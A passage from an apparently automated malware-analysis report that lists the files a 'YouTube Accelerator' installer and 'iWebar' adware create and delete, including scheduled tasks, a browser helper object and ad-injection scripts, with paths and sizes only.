%WinDir%\Temp\SBC56.tmp (0 bytes)
%WinDir%\Temp\SBC36.tmp (0 bytes)

The process YouTubeAcceleratorService.exe:1952 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\config.xml (60 bytes)

The process GLB12.tmp:3040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAFIL.LNG (351 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\Res.dll (7575 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\Cancel.gif (610 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\YouTubeAcceleratorService.exe (20644 bytes)
%Program Files%\YouTube Accelerator\~GLH0008.TMP (2784 bytes)
%Program Files%\YouTube Accelerator\~GLH0013.TMP (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GLM1C.tmp (12 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\YouTube Accelerator\~GLH0020.TMP (65 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\OK.gif (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\ytalsp.dll (4623 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GLC13.tmp (3624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VANLD.LNG (13 bytes)
%Program Files%\YouTube Accelerator\~GLH0009.TMP (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAROM.LNG (19 bytes)
%Program Files%\YouTube Accelerator\temp.000 (51331 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\YouTube Accelerator\YouTube Accelerator.lnk (833 bytes)
%Documents and Settings%\%current user%\Desktop\YouTube Accelerator.lnk (821 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAPTB.LNG (401 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAFRA.LNG (402 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\AniGIF.ocx (4087 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GLK1A.tmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\YouTubeAccelerator.exe (35420 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VASRB.LNG (1184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\ipc.dll (4900 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\updater.exe (12216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\progbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\YTAuninstall.mht (761 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\sporder.Dll (420 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VASRB.LNG (1184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\~GLH0006.TMP (76524 bytes)
%Program Files%\YouTube Accelerator\~GLH001a.TMP (12626 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~GLH0000.TMP (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VATRK.LNG (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~GLH0001.TMP (2104 bytes)
%Program Files%\YouTube Accelerator\~GLH0010.TMP (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\unelevate.exe (2050 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAIDN.LNG (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\comtest.gif (210 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GLJ15.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAPTB.LNG (401 bytes)
%Program Files%\YouTube Accelerator\~GLH000b.TMP (18940 bytes)
%Program Files%\YouTube Accelerator\~GLH000e.TMP (7581 bytes)
%Program Files%\YouTube Accelerator\~GLH0012.TMP (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\varemove_page1.mht (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~GLH0003.TMP (119 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\testlsp.exe (20210 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VADEU.LNG (18 bytes)
%Program Files%\YouTube Accelerator\~GLH0016.TMP (4061 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAPOL.LNG (1166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAFRA.LNG (402 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAITA.LNG (1660 bytes)
%Program Files%\YouTube Accelerator\INSTALL.LOG (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAFAR.LNG (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\xmldb.dll (4592 bytes)
%Program Files%\YouTube Accelerator\~GLH000c.TMP (11493 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAENG.LNG (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\lspinst2.exe (28114 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\engine.dll (34715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAFAR.LNG (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAESM.LNG (873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VATRK.LNG (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAITA.LNG (1660 bytes)
%Program Files%\YouTube Accelerator\~GLH0019.TMP (11019 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\VAUninstall.exe (3418 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAROM.LNG (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GLG1E.tmp (96056 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VANLD.LNG (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAPOL.LNG (1166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAJPN.LNG (12 bytes)
%Program Files%\YouTube Accelerator\~GLH0011.TMP (610 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAJPN.LNG (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAENG.LNG (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAIDN.LNG (17 bytes)
%Program Files%\YouTube Accelerator\res\~GLH0015.TMP (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~GLH0004.TMP (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VADEU.LNG (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\LocalesU\VAESM.LNG (873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\~GLH0007.TMP (1568 bytes)
%Program Files%\YouTube Accelerator\~GLH000f.TMP (11493 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~GLH0002.TMP (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\varemove_page2.mht (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\helper.dll (4699 bytes)
%Program Files%\YouTube Accelerator\~GLH000d.TMP (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LocalesU\VAFIL.LNG (351 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\blank.html (75 bytes)
%Program Files%\YouTube Accelerator\~GLH000a.TMP (3624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\~GLH001f.TMP (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~GLH0005.TMP (65 bytes)
%System%\temp.000 (3624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\lspinst.exe (22571 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\GLJ15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GLB1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GLF20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GLK1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GLC13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GLM1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GLG1E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GLF1F.tmp (0 bytes)
%System%\GLBSINST.%$D (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SAINST\LANGPACKU.CAB (0 bytes)

The process YouTubeAccelerator.exe:3416 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\engine_2720_testlsp.log_tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wbk49.tmp (242 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\test.mht (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wbk41.tmp (1 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\premium_now_accelerating.mht (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wbk55.tmp (1 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\olddriver.mht (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wbk3B.tmp (242 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\testlsp_2720.log_tmp (809 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\YouTubeAccelerator_3416.log_tmp (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\SMALLTEST[1].htm (70 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\activation_expired.mht (22 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\helper_2720_testlsp.log_tmp (144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wbk43.tmp (1 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\trial_video_accelerator.mht (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wbk53.tmp (1 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\restart.mht (22 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\exiting.mht (22 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\hd_disabled.mht (22 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\ipc_2720_testlsp.log_tmp (1 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\itunesmessage.mht (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wbk45.tmp (1 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\noupdates.mht (30 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\blank.html (97 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\acceleration_not_supported.mht (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wbk4F.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wbk4D.tmp (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wbk4B.tmp (682 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\YouTubeAcceleratorService_2516.log_tmp (493 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\dl_update.mht (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wbk3D.tmp (682 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\config.xml (3740 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\silenttestfailed.mht (22 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\va_off.mht (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wbk47.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\wbk51.tmp (1 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\trial_now_accelerating.mht (30 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\engine_2516_YouTubeAcceleratorService.log_tmp (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\wbk3F.tmp (50 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\trialexp_video_accelerator.mht (38 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\premium_video_accelerator.mht (38 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\LspCommTest.zip (191898 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\video_accelerator.mht (38 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\tweetmessage.mht (22 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\now_accelerating.mht (30 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\silenttestsucceeded.mht (22 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\oem_video_accelerator.mht (38 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\YouTubeAccelerator_3416.log (81259 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\va_on.mht (22 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\update.mht (31 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Res\VARes_1000008\activation_offline.mht (22 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\wbk4C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk52.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk3A.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\engine_2720_testlsp.log_tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\engine_2516_YouTubeAcceleratorService.log_tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk3E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk4E.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\YouTubeAcceleratorService_2516.log_tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk46.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk48.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\testlsp_2720.log_tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk44.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk50.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\ipc_2720_testlsp.log_tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk40.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk54.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\helper_2720_testlsp.log_tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\GOOBZO\YouTube Accelerator\Log\YouTubeAccelerator_3416.log_tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk3C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wbk4A.tmp (0 bytes)

The process iWebar-codedownloader.exe:2412 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\adextent_m[1].js (431 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\monetizationLoader[1].js (72929 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\price_gong_m[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ie[1].js (491 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\dealply_m[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\app_code[1].js (2977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\superfish_no_coupons_m[1].js (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\plugins[1].json (4153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\similar_products_m[1].js (48329 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\similar_products_m[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\monetizationLoader[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\dealply_m[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\superfish_no_coupons_m[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\setup[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\adextent_m[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie[1].js (0 bytes)

The process iedw.exe:3480 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\ieC8AB.tmp (260602 bytes)

The process Ixesxgrajdtli.exe:3116 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\64.js (2 bytes)
%Program Files%\iWebar\utils.exe (33376 bytes)
%Program Files%\iWebar\iWebar-buttonutil.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm22.tmp (294893 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\13.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\14.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.194063\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\7.js (685 bytes)
%Program Files%\iWebar\34d16228-9e90-4879-9804-8e38b5180d78-4.exe (5873 bytes)
%WinDir%\Tasks\34d16228-9e90-4879-9804-8e38b5180d78-4.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\userCode\extension.js (15 bytes)
%WinDir%\Tasks\34d16228-9e90-4879-9804-8e38b5180d78-1.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\195.js (378 bytes)
%Program Files%\iWebar\iWebar-buttonutil.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.194063\GoogleUpdateHelper.msi (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\22.js (8 bytes)
%Program Files%\iWebar\34d16228-9e90-4879-9804-8e38b5180d78-5.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\78.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\72.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.194063\npGoogleUpdate4.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\223.js (453 bytes)
%Program Files%\iWebar\iWebar.ico (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\102.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\InstallerUtils.dll (25824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.194063\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\112967 (209936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\37.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\226.js (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\manifest.xml (1 bytes)
%Program Files%\iWebar\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\220.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\204.js (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\91.js (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\update[1].json (39 bytes)
%WinDir%\Tasks\34d16228-9e90-4879-9804-8e38b5180d78-2.job (70 bytes)
%Program Files%\iWebar\35510.xpi (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\155.js (449 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\182.js (14 bytes)
%Program Files%\iWebar\iWebar-codedownloader.exe (3073 bytes)
%WinDir%\Tasks\34d16228-9e90-4879-9804-8e38b5180d78-5.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\217.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\2.js (63 bytes)
%WinDir%\Tasks\temp_34d16228-9e90-4879-9804-8e38b5180d78-2.job (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\42.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\207.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.194063\goopdate.dll (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\1.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.194063\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.194063\GoogleUpdateBroker.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.194063\psuser.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins.json (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\ExecDos.dll (5 bytes)
%Program Files%\iWebar\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\28.js (536 bytes)
%Program Files%\iWebar\iWebar-bg.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\104.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\114943 (781608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.194063\goopdateres_en.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\244.js (501 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\4.js (3312 bytes)
%Program Files%\iWebar\34d16228-9e90-4879-9804-8e38b5180d78-2.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\246.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\94.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.194063\psmachine.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\3.js (63 bytes)
%Program Files%\iWebar\iWebar-bho.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx23.tmp\extensionData\plugins\93.js (793 bytes)
